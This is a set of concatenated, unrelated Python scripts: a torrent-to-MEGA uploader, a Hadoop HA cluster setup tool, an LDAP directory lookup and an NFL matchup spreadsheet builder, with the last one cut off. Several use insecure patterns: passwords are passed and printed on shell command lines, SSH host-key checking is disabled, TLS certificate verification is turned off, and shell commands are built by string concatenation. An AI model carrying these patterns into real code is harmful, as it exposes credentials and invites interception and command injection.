	# Drop the stale remote status marker before (possibly) re-creating it.
	print 'removing mega folder for status'
	args=shlex.split('"'+megatoolsPath+'megarm" -u '+username+' -p '+password+' /Root/TorrentToCloud/'+strToValidFilename(name)+'_'+hash+'/status')
	print 'args2:'+str(args)
	process = Popen(args, stdout=PIPE, stderr=PIPE)
	stdout2, stderr2 = process.communicate()
	print '\noutput: '+stdout2+'\n'+stderr2+'^'
	# While still downloading, mirror the local progress marker to MEGA.
	if not finishedTorrenting:
		print 'creating mega folder for status'
		args=shlex.split('"'+megatoolsPath+'megamkdir" -u '+username+' -p '+password+' /Root/TorrentToCloud/'+strToValidFilename(name)+'_'+hash+'/status')
		print 'args2:'+str(args)
		process = Popen(args, stdout=PIPE, stderr=PIPE)
		stdout2, stderr2 = process.communicate()
		print '\noutput: '+stdout2+'\n'+stderr2+'^'
		print stdout2+stderr2
		if os.path.exists('downloads/'+hash+'/status'):
			print 'adding new status file'
			args=shlex.split('"'+megatoolsPath+'megacopy" -u '+username+' -p '+password+' --remote /Root/TorrentToCloud/'+strToValidFilename(name)+'_'+hash+'/status --local '+'downloads/'+hash+'/status')
			print 'args3:'+str(args)
			process = Popen(args, stdout=PIPE, stderr=PIPE)
			stdout2, stderr2 = process.communicate()
			print stdout2+stderr2
			print '\noutput: '+stdout2+'\n'+stderr2+'^'
		else:
			print 'srthiorsiotrsh'
#	clearTemp()
#	print 'copying to temp'
#	for file in os.listdir(copydir):
#		if not file=='status':
#			if os.path.isfile(copydir+'/'+file):
#				print 'copy file '+copydir+'/'+file
#				copyFileToTemp(copydir+'/'+file)
#			#copyAllToTemp(copydir)
#			if os.path.isdir(copydir+'/'+file):
#				print 'copy folder '+copydir+'/'+file
#				copyAllToTemp(copydir+'/'+file)
#	zipf = zipfile.ZipFile('Python.zip', 'w')
#	zipdir(copydir, zipf)
#	zipf.close()
	os.chdir(copydir)
	print 'adding the final files'
	if not zipFiles:
		# Direct mirror of the download folder to the remote torrent folder.
		args=shlex.split('"'+megatoolsPath+'megacopy" -u '+username+' -p '+password+' --remote /Root/TorrentToCloud/'+strToValidFilename(name)+'_'+hash+' --local .')#"'+copydir+'"')
		print 'args3:'+str(args)
		process = Popen(args, stdout=PIPE, stderr=PIPE)
		stdout2, stderr2 = process.communicate()
		#print stdout2+stderr2
		print '\noutput: '+stdout2+'\n'+stderr2+'^'
	else:
		# Pack everything except the status marker into one archive, then
		# upload it and delete the local zip.
		zipname=None
		for file in os.listdir('.'):
			if not file=='status':
				args=shlex.split('"'+zip7Path+'7z" a "'+thisdir+'/temp/'+name+'.zip" "'+file+'"')#"'+copydir+'"')
				print 'args3:'+str(args)
				process = Popen(args, stdout=PIPE, stderr=PIPE)
				stdout2, stderr2 = process.communicate()
				print '\noutput: '+stdout2+'\n'+stderr2+'^'
				zipname=thisdir+'/temp/'+name+'.zip'
#			if os.path.isfile(file):
#				print 'adding the final files'
#				args=shlex.split('"'+megatoolsPath+'/megaput" -u '+username+' -p '+password+' --path /Root/TorrentToCloud/'+strToValidFilename(name)+'_'+hash+'/'+file+' "'+copydir+'/'+file+'"')
#				print 'args3:'+str(args)
#				process = Popen(args, stdout=PIPE, stderr=PIPE)
#				stdout2, stderr2 = process.communicate()
#				print stdout2+stderr2
#				print '\noutput: '+stdout2+'\n'+stderr2+'^'
#			if os.path.isdir(file):
#				print 'adding the final files'
#				args=shlex.split('"'+megatoolsPath+'/megacopy" -u '+username+' -p '+password+' --remote /Root/TorrentToCloud/'+strToValidFilename(name)+'_'+hash+' --local "'+copydir+'/'+file+'"')
#				print 'args3:'+str(args)
#				process = Popen(args, stdout=PIPE, stderr=PIPE)
#				stdout2, stderr2 = process.communicate()
#				print stdout2+stderr2
#				print '\noutput: '+stdout2+'\n'+stderr2+'^'
#			print 'fileesrthsrthre:'+file
		if not zipname==None:
			args=shlex.split('"'+megatoolsPath+'megaput" -u '+username+' -p '+password+' --path /Root/TorrentToCloud/'+strToValidFilename(name)+'_'+hash+' "'+zipname+'"')#"'+copydir+'"')
			print 'args3:'+str(args)
			process = Popen(args, stdout=PIPE, stderr=PIPE)
			stdout2, stderr2 = process.communicate()
			print '\noutput: '+stdout2+'\n'+stderr2+'^'
			os.remove(zipname)
	registerDownloadCompleted(hash,username)
	os.chdir(olddir)
def processMagnetLink(username,password,magnet):
	"""Handle one magnet link for a user: queue it, and sync finished data.

	The torrent hash is the text between the magnet prefix and the first
	'&' (or the end of the string).  New hashes are handed to deluge;
	hashes deluge has already reported on are pushed to MEGA.
	"""
	endhash=magnet.find('&')
	if(endhash==-1):
		endhash=len(magnet)
	hash=magnet[magnet.index(mstart)+len(mstart):endhash]
	print 'hash:'+hash
	isNew=createTorrentFromMagnet(magnet,hash)
	if not isNew:
		print 'torrent not new '+str(hash)+str(completedStatus)
		if hash in completedStatus:
			#add files to mega
			print 'mega update files'
			megaUpdateFiles(username, password, hash)
def processUser(username,password):
	"""Process one MEGA account: harvest magnet links and act on them.

	Magnet links are discovered two ways: from megals' stderr (lines the
	tool reports as invalid paths) and from file names listed under
	/Root/TorrentToCloud.  The folder is created when missing.
	"""
	print username+" , "+password
	print "thisdir "+thisdir
	#os.chdir(delugePath)
	#args=shlex.split('"'+delugePath+'deluge-console"')
	#print 'args '+str(args)
	#print 'afklwefg \n'+str(args)+'\n'+str(subprocess.check_output(args))
	#os.chdir(megatoolsPath)
	print os.getcwd()
	args=shlex.split('"'+megatoolsPath+'megals" -u '+username+' -p '+password+' --reload')
	print args
	process = Popen(args, stdout=PIPE, stderr=PIPE)
	stdout, stderr = process.communicate()
	# Magnet links show up on stderr as "invalid '<magnet>'" complaints;
	# extract the text after the quote and process each one.
	for s in stderr.split('\n'):
		s=s[:-2]
		if len(s)>10 and len(s)<1500 and mstart in s:
			print 'errpart is:'+s+'^'
			print 'extracted magnet:^'+s[s.index("invalid '")+9:]+'^'#'##'+s+'@@\n***********\n'
			magnet=s[s.index("invalid '")+9:]
			processMagnetLink(username,password,magnet)
	megals=stdout#str(subprocess.check_output(args))
	print '\ntestfdghsru7456\n'
	hasFolder=False
	hasMagnetFile=False
	# Scan the remote listing for the working folder and magnet-named files.
	for s in megals.split('\n'):
		s=s[:-1]
		print '$$'+s+'\n^^^^^^^^\n'
		if s=='/Root/TorrentToCloud':
			hasFolder=True
		if s=='Root/TorrentToCloud/magnets.txt':
			hasMagnetFile=True
		if '/Root/TorrentToCloud' in s:
			if 'magnet:?xt=urn:btih:' in s:
				magnet=s[len('Root/TorrentToCloud/ '):]
				print 'magnet is '+magnet
				print 'len'+str(len(magnet))
				processMagnetLink(username,password,magnet)
	if not hasFolder: #make the folder if it does not exist
		args=shlex.split('"'+megatoolsPath+'megamkdir" -u '+username+' -p '+password+' '+'/Root/TorrentToCloud')
		print args
		megamkdir=str(subprocess.check_output(args))
		print megamkdir
#	if not hasMagnetFile:
#		print os.getcwd()
#		print 'thisdir2 '+thisdir
#		args=shlex.split('megaput --path /Root/TorrentToCloud/magnets.txt -u '+username+' -p '+password+' "' +thisdir+'/magnets.txt"')
#		print 'attempt make magnetstxt'
#		megaput=str(subprocess.check_output(args))
#		print megaput
#		args=shlex.split('megals -u '+username+' -p '+password)
#		megals=str(subprocess.check_output(args))
#		print megals
#	else:
#		args=shlex.split('megaget -u '+username+' -p '+password+' /Root/TorrentToCloud/magnets.txt')
#		megaget=str(subprocess.check_output(args))
def findHashEnd(astr):
	"""Index of the first non-alphanumeric character in *astr*.

	When the whole string is alphanumeric this returns len(astr) - 1
	(and -1 for the empty string).  Callers slice with the result, so the
	quirk of dropping the final character in the all-alnum case is
	preserved deliberately -- confirm before 'fixing' it.
	"""
	for position, character in enumerate(astr):
		if not character.isalnum():
			return position
	return len(astr) - 1
def updateTorrentStatus():
	"""Parse `deluge-console info` output and refresh per-torrent state.

	For every torrent it extracts name, ID (hash), size and progress,
	rewrites the local downloads/<id>/status marker, and records
	completedStatus[id] = [name, finished] for megaUpdateFiles().
	Returns early when deluge is unreachable.
	"""
	args=shlex.split('"'+delugePath+'deluge-console" info')
	print '\ntorrent info: '+str(args)
	process = Popen(args, stdout=PIPE, stderr=PIPE)
	stdout, stderr = process.communicate()
	print 'stdout:'+stdout
	if len(stdout)<1000 and 'No connection could be made' in stdout:
		return
	#addtorrent=str(subprocess.check_output(args))
	name=''
	id=''
	size=''
	finished=False
	# Each torrent record in the report begins with "Name: ".
	parts=stdout.split('\nName: ')
	for part in parts:
		print '\n$$$$$$$$$$$$\n'+part
		if len(part)>50:
			endline=part.index('\n')
			if '\r\n' in part:
				endline=part.index('\r\n')
			name=part[:endline]
			#print 'name:'+name+'^'
			next=part[len(name):]
			print 'ni pre:'+next
			print 'nextinfo:'+str(next.index('ID: ')+len('ID: '))+'^ '#+str(next.index('\n'))+'^'
			next2=next[next.index('ID: ')+len('ID: '):]
			id=next2[:findHashEnd(next2)]#next.index('\n')-1]
			#print 'id:'+id+'^'
			next=next[next.index('Size: '):]
			size=next[next.index('Size: ')+len('Size: '):next.index(' Ratio')]
			#print 'size:'+size+'^'
			# Size is reported as "<downloaded>/<total>"; equality means done.
			sparts=size.split('/')
			finished=sparts[0]==sparts[1]
			progress='unknown'
			if 'Progress: ' in next:
				next=next[next.index('Progress: ')+len('Progress: '):]
				progress=next[:next.index('[')-1]
			#print 'finished: '+str(finished)
			tfolder='downloads/'+id
			print 'tfolder: '+tfolder
			if os.path.exists(tfolder):
				print 'replacing status directory '+tfolder+' '+size
				replaceStatusDirectory(tfolder,progress)
			completedStatus[id]=[name,finished]
			#if not part.index('')
	#print '\ninfo: '+stdout+'\n'+stderr+'^'
	#register this torrent as having been added
print "\n\n*************\n\n"
# Resolve the script directory, then pull tool locations and options from
# config.txt, normalising each path to end with '/' when set.
thisdir=getScriptPath()
Config = ConfigParser.ConfigParser()
Config.read("config.txt")
print Config.sections()
# NOTE(review): `global` at module level is a no-op; these statements can
# be removed without any effect.
global delugePath
delugePath=Config.get('file','DelugeInstall')
if delugePath==' ' or delugePath=='':
	delugePath='';
else:
	delugePath+='/'
global megatoolsPath
megatoolsPath=Config.get('file','MegatoolsInstall')
if megatoolsPath==' ' or megatoolsPath=='':
	megatoolsPath='';
else:
	megatoolsPath+='/'
global interval
interval=Config.getint('other','interval_seconds')
print interval+5
global zipFiles
zipFiles=Config.getboolean('other','zip_files')
print 'zipfiles:'+str(zipFiles)
global zip7Path
zip7Path=Config.get('file','7ZipInstall')
if zip7Path==' ' or zip7Path=='':
	zip7Path='';
else:
	zip7Path+='/'
print '7zpath: '+zip7Path
ensureFolderExists(thisdir+'/downloads')
ensureFolderExists(thisdir+'/temp')
# Main polling loop: refresh torrent state, process every account listed in
# accounts.csv, then idle until the configured interval has elapsed.
while True:
	start=time.time()
	print 'starting check at '+str(start)
	updateTorrentStatus()
	with open('accounts.csv', 'rb') as f:
		reader = csv.reader(f)
		count=0
		for row in reader:
			# NOTE(review): the count>0 guard does nothing (pass), so a
			# header row, if present, is also treated as an account.
			if count>0:
				pass
			processUser(row[0],row[1])
			count+=1
	#registerUploadsCompleted()
	print 'waiting for next check'
	while time.time()-start < interval:
		print str(time.time()-start)+'/'+str(interval)
		time.sleep(5)
|
from lxml import etree
import re
import os
import sys
import time
from hadoop.hadoop.node import *
from hadoop.hadoop.nameservice import *
from hadoop.hadoop.hadoopinfo import *
# Home directory of the invoking user; Hadoop work/data dirs live under it.
home = os.environ['HOME']
def addProperty(root, name, value):
    """Append a <property><name>..</name><value>..</value></property> child to *root*."""
    snippet = '<property><name>%s</name><value>%s</value></property>' % (name, value)
    root.append(etree.XML(snippet))
def modifyProperty(root, name, value):
    """Set the <value> of every property whose <name> text matches *name*.

    *name* is treated as a regular expression by re.match, so dots in
    property names act as wildcards.  NOTE(review): the inner loop tests
    every child element (<value> texts included) and relies on the
    lxml-only Element.getnext(); a <value> whose text happens to match
    the pattern would itself be rewritten -- confirm this is acceptable.
    """
    for property in root:
        for elem in property:
            if re.match(name, elem.text):
                elem.getnext().text = value
def clean(root, pattern):
    """Remove every <property> child of *root* that has a child element
    whose text matches the regular expression *pattern*.

    Bug fix: the original removed children from *root* while iterating
    over it, which makes ElementTree/lxml skip the sibling that follows
    each removed property, leaving matching properties behind.  Iterating
    over a snapshot (list(root)) fixes that; the break prevents a second
    root.remove() of the same property when several children match.
    """
    for property in list(root):
        for elem in property:
            if re.match(pattern, elem.text):
                root.remove(property)
                break
def initialise():
    """Strip every HA-related property from the hdfs/core site configs and
    write the cleaned trees back, giving a known baseline before
    setConfiguration() re-adds what the cluster layout needs.
    """
    clean(hdfs_root, "dfs.ha.namenodes*")
    clean(hdfs_root, "dfs.namenode.rpc-address*")
    clean(hdfs_root, "dfs.namenode.http-address*")
    clean(hdfs_root, "dfs.namenode.shared.edits.dir*")
    clean(hdfs_root, "dfs.client.failover.proxy.provider*")
    clean(hdfs_root, "dfs.ha.fencing.methods*")
    clean(hdfs_root, "dfs.ha.fencing.ssh.private-key-files*")
    clean(hdfs_root, "dfs.namenode.checkpoint*")
    clean(hdfs_root, "dfs.journalnode.edits.dir*")
    clean(hdfs_root, "dfs.nameservices*")
    clean(hdfs_root, "dfs.ha.automatic-failover.enabled*")
    clean(core_root, "ha.zookeeper.quorum*")
    # Persist the cleaned trees, preserving each file's original encoding.
    et = etree.ElementTree(hdfs_root)
    docinfo= hdfs_tree.docinfo
    et.write(path + "/conf/hadoop/hdfs-site.xml", pretty_print=True, xml_declaration=True, encoding=docinfo.encoding)
    et = etree.ElementTree(core_root)
    docinfo= core_tree.docinfo
    et.write(path + "/conf/hadoop/core-site.xml", pretty_print=True, xml_declaration=True, encoding=docinfo.encoding)
def setNormalConfiguration(config):
    """Fill in the non-HA base settings (single-namenode defaults).

    Points fs.defaultFS at the first namenode of the first nameservice
    and roots all HDFS/YARN work directories plus the tmp dir under
    $HOME/hadoop_work.
    """
    modifyProperty(core_root, "fs.defaultFS", "hdfs://" + config.nameservices[0].namenodes[0].hostname + ":8020")
    modifyProperty(hdfs_root, "dfs.namenode.name.dir", "file:" + home +"/hadoop_work/hdfs/namenode")
    modifyProperty(hdfs_root, "dfs.datanode.data.dir", "file:" + home +"/hadoop_work/hdfs/datanode")
    modifyProperty(yarn_root, "yarn.nodemanager.local-dirs", "file:" + home +"/hadoop_work/yarn/local")
    modifyProperty(yarn_root, "yarn.nodemanager.log-dirs", "file:" + home +"/hadoop_work/yarn/log")
    modifyProperty(mapred_root, "mapreduce.jobhistory.address", config.jobhistory.hostname + ":10020")
    modifyProperty(mapred_root, "mapreduce.jobhistory.webapp.address", config.jobhistory.hostname + ":19888")
    modifyProperty(core_root, "hadoop.tmp.dir", "file:" + home +"/tmp")
def setnamenodeHA(config):
    """Layer namenode HA settings on top of the base configuration.

    For every HA-enabled nameservice this declares its namenodes with
    their RPC (8020) and HTTP (50070) endpoints, the shared JournalNode
    edits dir, the failover proxy provider, automatic failover and the
    ZooKeeper quorum, plus SSH fencing using the local id_rsa key.
    """
    addProperty(hdfs_root, "dfs.nameservices", config.getNameservicesname())
    for nameservice in config.nameservices:
        if nameservice.HAenable:
            addProperty(hdfs_root, "dfs.ha.namenodes." + nameservice.name, nameservice.getNamenodesID())
            for namenode in nameservice.namenodes:
                addProperty(hdfs_root, "dfs.namenode.rpc-address." + nameservice.name + "." + namenode.id,
                            namenode.hostname + ":8020")
                addProperty(hdfs_root, "dfs.namenode.http-address." + nameservice.name + "." + namenode.id,
                            namenode.hostname + ":50070")
            addProperty(hdfs_root, "dfs.namenode.shared.edits.dir", nameservice.getJournalnodesHost())
            addProperty(hdfs_root, "dfs.client.failover.proxy.provider." + nameservice.name,
                        "org.apache.hadoop.hdfs.server.namenode.ha.ConfiguredFailoverProxyProvider")
            addProperty(hdfs_root, "dfs.ha.automatic-failover.enabled", "true")
            # Clients address the logical nameservice, not a single host.
            modifyProperty(core_root, "fs.defaultFS", "hdfs://" + nameservice.name)
    addProperty(core_root, "ha.zookeeper.quorum", config.getZookeepersHost())
    modifyProperty(yarn_root, "yarn.resourcemanager.hostname", config.nameservices[0].resourcemanagers[0].hostname)
    addProperty(hdfs_root, "dfs.ha.fencing.methods", "sshfence")
    addProperty(hdfs_root, "dfs.journalnode.edits.dir", home + "/hadoop_work/hdfs/journalnode")
    addProperty(hdfs_root, "dfs.ha.fencing.ssh.private-key-files", home + "/.ssh/id_rsa")
def writeConfiguration():
    """Serialise the four in-memory config trees back to conf/hadoop/*.xml,
    preserving each source file's original encoding."""
    outputs = (
        (hdfs_root, hdfs_tree, "hdfs-site.xml"),
        (core_root, core_tree, "core-site.xml"),
        (yarn_root, yarn_tree, "yarn-site.xml"),
        (mapred_root, mapred_tree, "mapred-site.xml"),
    )
    for root, tree, filename in outputs:
        etree.ElementTree(root).write(path + "/conf/hadoop/" + filename,
                                      pretty_print=True, xml_declaration=True,
                                      encoding=tree.docinfo.encoding)
def setConfiguration(config):
    """Write the base config, then layer HA settings on top when enabled.

    In the HA case the files are written twice: once with the base values
    and again after setnamenodeHA() mutates the trees.  Also regenerates
    the hosts and slaves files from the cluster description.
    """
    setNormalConfiguration(config)
    writeConfiguration()
    if config.HAenable:
        setnamenodeHA(config)
        writeConfiguration()
    config.writeHosts()
    config.writeSlaves()
def startJournalNodes(config):
    """SSH into every JournalNode host and start the journalnode daemon.

    JournalNodes must be running before the first `namenode -format`.
    """
    for nameservice in config.nameservices:
        for journalnode in nameservice.journalnodes:
            os.system("ssh -o StrictHostKeyChecking=no " + journalnode.ip + " /usr/local/hadoop/sbin/hadoop-daemon.sh start journalnode")
def formatNamenode(config):
    """Format the primary namenode and bootstrap every standby.

    The very first namenode of the first nameservice gets a full
    `hdfs namenode -format`; every other namenode is initialised with
    `-bootstrapStandby`.  Each is started right after via SSH heredocs.
    """
#    os.system("source /etc/profile.d/jdkenv.sh && source /etc/profile.d/hadoopenv.sh && \
#    /usr/local/hadoop/bin/hdfs namenode -format && /usr/local/hadoop/sbin/hadoop-daemon.sh start namenode")
    for index_ns, nameservice in enumerate(config.nameservices):
        for index_nn, namenode in enumerate(nameservice.namenodes):
            if index_ns == 0 and index_nn == 0:
                os.system("ssh -o StrictHostKeyChecking=no " + namenode.hostname + " <<DONE\n\
            /usr/local/hadoop/bin/hdfs namenode -format\n\
            /usr/local/hadoop/sbin/hadoop-daemon.sh start namenode\nDONE\n")
            else:
                os.system("ssh -o StrictHostKeyChecking=no " + namenode.hostname + " <<DONE\n\
            /usr/local/hadoop/bin/hdfs namenode -bootstrapStandby\n\
            /usr/local/hadoop/sbin/hadoop-daemon.sh start namenode\nDONE\n")
def setSSHInNN(config, password):
    """Distribute SSH keys so every namenode can reach every other node.

    For each namenode other than the control node, runs the sshserver
    setup script on it and then the sshclient script against every other
    node's IP, passing *password* for the initial authentication.
    """
    for nameservice in config.nameservices:
        for namenode in nameservice.namenodes:
            if namenode != config.namenode:
                os.system("ssh -o StrictHostKeyChecking=no " + namenode.hostname + " -C '/bin/bash -s' < " + path + "/ssh/sshserver.sh " + password)
            for ip in config.allNodesIp:
                if namenode.ip != ip:
                    os.system("ssh -o StrictHostKeyChecking=no " + namenode.hostname + " bash -s < " + path + "/ssh/sshclient.sh " + password + " " + ip)
def setZookeepers(config, password):
    """Generate zoo.cfg from the sample and provision every ZooKeeper node.

    Appends one server.N line per configured zookeeper, then runs the
    per-node zookeeper.sh setup script with its 1-based server id.
    """
    os.system("rm " + path + "/conf/zookeeper/zoo.cfg")
    os.system("cp " + path + "/conf/zookeeper/zoo_sample.cfg " + path + "/conf/zookeeper/zoo.cfg")
#    for zookeeper in config.zookeepers:
    for index, zookeeper in enumerate(config.zookeepers):
        os.system("echo server." + str(index + 1) + "=" + zookeeper.hostname + ":2888:3888 >> " + path + "/conf/zookeeper/zoo.cfg")
#    for nameservice in config.nameservices:
    for index, zookeeper in enumerate(config.zookeepers):
        os.system(path + "/zookeeper/zookeeper.sh " + password + " " + zookeeper.ip + " " + str(index+1))
def formatZookeeper():
    """Stop HDFS and format the ZKFC znode for automatic failover."""
    os.system("/usr/local/hadoop/sbin/stop-dfs.sh")
    os.system("source /etc/profile.d/jdkenv.sh && source /etc/profile.d/hadoopenv.sh && $HADOOP_PREFIX/bin/hdfs zkfc -formatZK")
if __name__ == "__main__":
    # Configuration, config_root and path come from the star-imported
    # hadoop.hadoop.* modules -- presumably hadoopinfo; confirm there.
    config = Configuration(config_root)
    initialise()
    setConfiguration(config)
    argv = sys.argv
    # NOTE(review): the usage check runs AFTER the config files were
    # already rewritten above; consider validating argv first.
    if len(sys.argv) != 2:
        print 'Usage : Script <password>'
        sys.exit(1)
    # Pre-configure the control node, then every client node.
    if os.system(path + "/serverpreconfig.sh" + " " + argv[1]) == 0:
        os.system("clear")
        print "Pre-configuration of Server is done."
    else:
        print "Pre-configuration of Server failed."
        sys.exit(1)
    for ip in config.allNodesIp:
        if ip != config.namenode.ip:
            if os.system(path + "/clientpreconfig.sh" + " " + argv[1] + " " + ip) == 0:
                os.system("clear")
                print "Pre-configuration of client " + ip + " is done."
            else:
                print "Pre-configuration of client " + ip + " failed."
                sys.exit(1)
    # Install Hadoop on the master, then on every slave.
    if os.system(path + "/hadoop/hadoopmaster.sh" + " " + argv[1] + " " + config.namenode.hostname) == 0:
        os.system("clear")
        print "Hadoop configuration of Server is done."
    else:
        print "Hadoop configuration of Server failed."
        sys.exit(1)
    for (ip, hostname) in config.clients.items():
        if os.system(path + "/hadoop/hadoopslave.sh" + " " + argv[1] + " " + ip + " " + hostname) == 0:
            os.system("clear")
            print "Hadoop configuration of client " + ip + " is done."
        else:
            print "Hadoop configuration of client " + ip + " failed."
            sys.exit(1)
    # Bring the HA cluster up: journalnodes first, then namenode format,
    # SSH fan-out, ZooKeeper provisioning and ZKFC format.
    startJournalNodes(config)
    formatNamenode(config)
    setSSHInNN(config, argv[1])
    setZookeepers(config, argv[1])
    formatZookeeper()
|
import ldap
import copy
import constants # Local module
def mergeDicts(toDict, fromDict):
    """Copy every key/value pair of *fromDict* into *toDict* in place.

    Keys and values are shallow-copied (copy.copy), so mutable values in
    the destination are independent objects.  Returns None -- and does
    nothing -- when either argument is not a dict.
    """
    if not (isinstance(fromDict, dict) and isinstance(toDict, dict)):
        return None
    for key, value in fromDict.items():
        toDict[copy.copy(key)] = copy.copy(value)
def getLDAPInfo(searchParamDict):
    """Query the UofA LDAP directory.

    Returns a dict with a meta section (success flag and, on success, a
    result count) and a data section (the attribute dicts of the matched
    entries).

    NOTE(review): this module is Python 2 only -- on Python 3 every str
    has __iter__, so the hasattr() check below would '&'-join the
    *characters* of a plain string keyword.  Also, joining several
    filters with a bare '&' does not form a valid LDAP AND filter
    (that is '(&(f1)(f2))'); confirm the intended semantics.
    """
    # Return results of a query on an ldap directory, given queryParameters
    # and/or searchFilters eg
    # To get users' phone numbers and emails whose
    # username is 'konradOno'
    # results = getLDAPInfo(
    #   {
    #       constants.SEARCH_KEY_WORD:'(uid=*konradOno)',
    #       constants.SEARCH_FILTERS_KEY:[constants.LDAP_MAIL_KEY,
    #                   constants.LDAP_PHONE_KEY]
    #   })
    #The results with have a meta section and a data section
    dataArray = list()
    metaDict = dict()
    resultsDict = dict()
    resultsDict[constants.DATA_KEY] = dataArray
    resultsDict[constants.META_KEY] = metaDict
    #metaDict[constants.SEARCH_PARAMS_KEY] = None
    #metaDict[constants.SEARCH_FILTERS_KEY] = None
    metaDict[constants.SUCCESS_STATUS_KEY] = False
    searchKeyWord = searchParamDict.get(constants.SEARCH_KEYWORD_KEY)
    print(searchParamDict, constants.SEARCH_KEYWORD_KEY)
    if hasattr(searchKeyWord, '__iter__'):
        searchKeyWord = "&".join(filter(lambda s: s, searchKeyWord))
    if not (isinstance(searchParamDict, dict) and searchKeyWord): return resultsDict
    print("srPD ", searchParamDict)
    # !!! Once you are ready to deploy and have made your certificate signed
    # and recognized by the UOFA, set the last argument to True !!
    ldap.set_option(ldap.OPT_X_TLS_REQUIRE_CERT, False)
    uofa_ldapObject = ldap.initialize(constants.UOFA_LDAP_URI)
    defaultQueryParams = [constants.LDAP_SURNAME_KEY, constants.LDAP_PHONE_KEY,
                            constants.LDAP_GIVEN_NAME_KEY, constants.LDAP_UID_KEY]
    givenFilters = searchParamDict.get(constants.SEARCH_FILTERS_KEY, defaultQueryParams)
    # Comma-separated filter strings are split into individual attributes.
    searchFilters = list()
    for aFilter in givenFilters:
        if ',' in aFilter:
            delimitedFilters = aFilter.split(',')
            searchFilters += map(lambda s: str(s), filter(lambda a:a, delimitedFilters))
        else: searchFilters.append(str(aFilter))
    print("searchFs ", searchFilters)
    #metaDict[constants.SEARCH_PARAMS_KEY] = searchKeyWord
    #metaDict[constants.SEARCH_FILTERS_KEY] = searchFilters
    try:
        searchResults = uofa_ldapObject.search_s(
            constants.UALBERTA_PEOPLE_TREE_SEARCH, ldap.SCOPE_SUBTREE,searchKeyWord,searchFilters
        )
    # NOTE(review): this broad catch hides the actual LDAP error; at least
    # log the exception before falling through with success=False.
    except Exception:
        #An unhandled exception occured here, implement handling later
        print("Exception here")
    else:
        metaDict[constants.SUCCESS_STATUS_KEY] = True
        resultsLen = len(searchResults)
        metaDict[constants.COUNT_KEY] = resultsLen
        dataArray = map(lambda tup: tup[1], searchResults)
        resultsDict[constants.DATA_KEY] = dataArray
    return resultsDict
def main():
    """Demo query: emails and phone numbers for uids containing 'klind'."""
    results = getLDAPInfo(
        {
            constants.SEARCH_KEYWORD_KEY:'(uid=*klind*)',
            constants.SEARCH_FILTERS_KEY : [
                constants.LDAP_EMAIL_KEY, constants.LDAP_PHONE_KEY
            ]
        }
    )
    print(results)
if __name__ == '__main__':
    main()
|
# Standard library
import collections
import itertools
import os
import sys
import time

# Third-party
import pandas as pd
import xlrd
import xlsxwriter

# Local modules
import matchup
import xlautofit
week_timer = time.time()
# Label used in the output filename; this run is a wildcard matchup matrix.
week_number = 'wc_matrix'

# The original file hand-enumerated all 66 pairings of these 12 teams in
# combination order; generate them instead so a team list edit cannot
# desynchronise from the pair list.
_TEAMS = ['NE', 'DEN', 'PIT', 'IND', 'CIN', 'BAL',
          'SEA', 'GB', 'DAL', 'CAR', 'ARI', 'DET']
matchups = collections.OrderedDict()
matchups['Matchups'] = list(itertools.combinations(_TEAMS, 2))
# Workbook path: <cwd>/Weekly Forecasts/Week<label>.xlsx (forward slashes).
location = os.getcwd().replace('\\', '/')
output_file = location + '/Weekly Forecasts/Week' + str(week_number) + '.xlsx'
# Two passes over the workbook: pass 0 simulates every matchup and writes the
# raw numbers; pass 1 re-reads the just-written file to compute even column
# widths and rewrites it with those widths applied.
for read_data in range(2):
    week_book = xlsxwriter.Workbook(output_file)
    header_format = week_book.add_format({'align': 'center', 'bold': True, 'bottom': True})
    index_format = week_book.add_format({'align': 'right', 'bold': True})
    score_format = week_book.add_format({'num_format': '#0', 'align': 'right'})
    percent_format = week_book.add_format({'num_format': '#0%', 'align': 'right'})
    if read_data:
        colwidths = xlautofit.even_widths_single_index(output_file)
    # One worksheet per matchups key (a single 'Matchups' sheet here).
    for game_time in matchups:
        if read_data:
            data_book = xlrd.open_workbook(output_file)
            data_sheet = data_book.sheet_by_name(game_time)
        sheet = week_book.add_worksheet(game_time)
        sheet.write_string(1, 0, 'Chance of Winning', index_format)
        sheet.write_string(2, 0, 'Expected Score', index_format)
        sheet.write_string(3, 0, '2.5th Percentile Score', index_format)
        sheet.write_string(4, 0, '10th Percentile Score', index_format)
        sheet.write_string(5, 0, '25th Percentile Score', index_format)
        sheet.write_string(6, 0, '50th Percentile Score', index_format)
        sheet.write_string(7, 0, '75th Percentile Score', index_format)
        sheet.write_string(8, 0, '90th Percentile Score', index_format)
        sheet.write_string(9, 0, '97.5th Percentile score', index_format)
        sheet.freeze_panes(0, 1)
        games = matchups[game_time]
        # Each game occupies two columns (home, away) plus a spacer column.
        for i in range(len(games)):
            home = games[i][0]
            away = games[i][1]
            homecol = 3 * i + 1
            awaycol = 3 * i + 2
            sheet.write_string(0, homecol, home, header_format)
            sheet.write_string(0, awaycol, away, header_format)
            if read_data:
                # Pass 1: copy the numbers computed on pass 0 back in.
                sheet.write_number(1, homecol, data_sheet.cell(1, homecol).value, percent_format)
                sheet.write_number(1, awaycol, data_sheet.cell(1, awaycol).value, percent_format)
                for rownum in range(2, 10):
                    sheet.write_number(rownum, homecol, data_sheet.cell(rownum, homecol).value, score_format)
                    sheet.write_number(rownum, awaycol, data_sheet.cell(rownum, awaycol).value, score_format)
            else:
                # Pass 0: run the simulation for this pairing.
                results = matchup.matchup(home, away)
                probwin = results['ProbWin']
                sheet.write_number(1, homecol, probwin[home], percent_format)
                sheet.write_number(1, awaycol, probwin[away], percent_format)
                home_dist = results['Scores'][home]
                away_dist = results['Scores'][away]
                sheet.write_number(2, homecol, home_dist['mean'], score_format)
                sheet.write_number(2, awaycol, away_dist['mean'], score_format)
                sheet.write_number(3, homecol, home_dist['2.5%'], score_format)
                sheet.write_number(3, awaycol, away_dist['2.5%'], score_format)
                sheet.write_number(4, homecol, home_dist['10%'], score_format)
                sheet.write_number(4, awaycol, away_dist['10%'], score_format)
                sheet.write_number(5, homecol, home_dist['25%'], score_format)
                sheet.write_number(5, awaycol, away_dist['25%'], score_format)
                sheet.write_number(6, homecol, home_dist['50%'], score_format)
                sheet.write_number(6, awaycol, away_dist['50%'], score_format)
                sheet.write_number(7, homecol, home_dist['75%'], score_format)
                sheet.write_number(7, awaycol, away_dist['75%'], score_format)
                sheet.write_number(8, homecol, home_dist['90%'], score_format)
                sheet.write_number(8, awaycol, away_dist['90%'], score_format)
                sheet.write_number(9, homecol, home_dist['97.5%'], score_format)
                sheet.write_number(9, awaycol, away_dist['97.5%'], score_format)
            if i != len(games) - 1:
